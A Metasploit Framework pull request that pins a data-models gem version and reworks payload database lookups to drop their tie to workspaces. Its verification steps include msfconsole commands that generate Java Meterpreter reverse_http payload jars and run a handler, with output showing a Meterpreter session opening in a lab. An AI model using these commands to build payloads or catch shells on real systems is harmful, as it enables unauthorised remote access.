### PR TITLE
Fix payload data model

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -22,7 +22,7 @@ PATH
       metasploit-credential
       metasploit-model
       metasploit-payloads (= 1.3.66)
-      metasploit_data_models
+      metasploit_data_models (= 3.0.10)
       metasploit_payloads-mettle (= 0.5.12)
       mqtt
       msgpack

--- a/lib/msf/core/db_manager/payload.rb
+++ b/lib/msf/core/db_manager/payload.rb
@@ -9,7 +9,7 @@ module Msf::DBManager::Payload
       end
 
       wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
-      wspace.payloads.create!(opts)
+      Mdm::Payload.create!(opts)
     end
   end
 
@@ -17,10 +17,14 @@ module Msf::DBManager::Payload
     ::ActiveRecord::Base.connection_pool.with_connection do
       if opts[:id] && !opts[:id].to_s.empty?
         return Array.wrap(Mdm::Payload.find(opts[:id]))
+      else
+        # Check the database for a matching UUID, returning an empty array if no results are found
+        begin
+          return Array.wrap(Mdm::Payload.find(uuid: opts[:uuid]))
+        rescue ActiveRecord::RecordNotFound
+          return []
+        end
       end
-
-      wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
-      return wspace.payloads.where(opts)
     end
   end
 

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
   # Metasploit::Credential database models
   spec.add_runtime_dependency 'metasploit-credential'
   # Database models shared between framework and Pro.
-  spec.add_runtime_dependency 'metasploit_data_models'
+  spec.add_runtime_dependency 'metasploit_data_models', '3.0.10'
   # Things that would normally be part of the database model, but which
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'


### PR DESCRIPTION
A recent update to [`metasploit_data_models`](https://github.com/rapid7/metasploit_data_models) removed the association between payloads and workspaces.  Per @bcook, and after a discussion among a few on the team, we decided to remove the `workspace` association from the `payload` object, making payloads independent from workspaces.

I made the change to the data models gem on 10-May, not realizing that the `metasploit-framework.gemspec` file did not lock the version of the `metasploit_data_models` gem.  Further, I did not realize that Jenkins would automatically upgrade the gem, incorporating the data model changes before the changes in this PR were ready and tested.

This PR addresses two changes in `lib/msf/core/db_manager/payload.rb`, where payloads were previously added or located via a `wspace` object.  Now, the payloads are added and located directly via `Mdm::Payload`, in line with the data model changes.

## Verification
To verify these changes, create a variety of payloads, making sure to explicitly set PayloadUUIDTracking on a UUID-supported payload to check multiple code paths:

Initial setup
- [x] Start `msfconsole`
- [x] Use `db_status` to confirm database connection via the `remote_data_service` (HTTP)

Payload generation
- [x] `use payload/java/meterpreter/reverse_http`
- [x] `set LHOST [your local IP]`
- [x] `set PayloadUUIDTracking false`
- [x] `generate -f jar -o uuid_disabled.jar`
- [x] `set PayloadUUIDTracking true`
- [x] `generate -f jar -o uuid_enabled.jar`
- [x] Confirm that both generate commands succeed without an exception.  (Previously, they triggered an exception: `Problem retrieving payload: undefined method `payloads'`)  A successful test looks like:

```
msf5 > use payload/java/meterpreter/reverse_http
msf5 payload(java/meterpreter/reverse_http) > set LHOST 192.168.199.202
LHOST => 192.168.199.202
msf5 payload(java/meterpreter/reverse_http) > set PayloadUUIDTracking false
PayloadUUIDTracking => false
msf5 payload(java/meterpreter/reverse_http) > generate -f jar -o uuid_disabled.jar
[*] Writing 5518 bytes to uuid_disabled.jar...
msf5 payload(java/meterpreter/reverse_http) > set PayloadUUIDTracking true
PayloadUUIDTracking => true
msf5 payload(java/meterpreter/reverse_http) > generate -f jar -o uuid_enabled.jar
[*] Writing 5578 bytes to uuid_enabled.jar...
msf5 payload(java/meterpreter/reverse_http) >
```

Payload callback
- [x] `use exploit/multi/handler`
- [x] `set PAYLOAD java/meterpreter/reverse_http`
- [x] `set LHOST [your local IP]`
- [x] `set PayloadUUIDTracking false`
- [x] `run`
- [x] Launch `uuid_disabled.jar`
- [x] Receive the callback and `exit` the Meterpreter session.
- [x] `set PayloadUUIDTracking true`
- [x] Launch `uuid_enabled.jar`
- [x] `run`
- [x] Receive the callback and `exit` the Meterpreter session.
- [x] Confirm that each callbacks is received successfully and does not trigger exceptions.  A successful test looks like:

```
msf5 payload(java/meterpreter/reverse_http) > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD java/meterpreter/reverse_http
PAYLOAD => java/meterpreter/reverse_http
msf5 exploit(multi/handler) > set LHOST 192.168.199.202
LHOST => 192.168.199.202
msf5 exploit(multi/handler) > set PayloadUUIDTracking true
PayloadUUIDTracking => true
msf5 exploit(multi/handler) > run

[*] Started HTTP reverse handler on http://192.168.199.202:8080
[*] http://192.168.199.202:8080 handling request from 192.168.199.152; (UUID: jltn7avh) Staging java payload (54399 bytes) ...
[*] Meterpreter session 5 opened (192.168.199.202:8080 -> 192.168.199.152:50842) at 2019-05-22 13:52:19 -0500
```

Optional:
 - [x] Disconnect from the HTTP remote_data_service (`db_disconnect`), to fallback to Postgres connectivity.
 - [x] Retry the steps within Payload generation and Payload callbacks.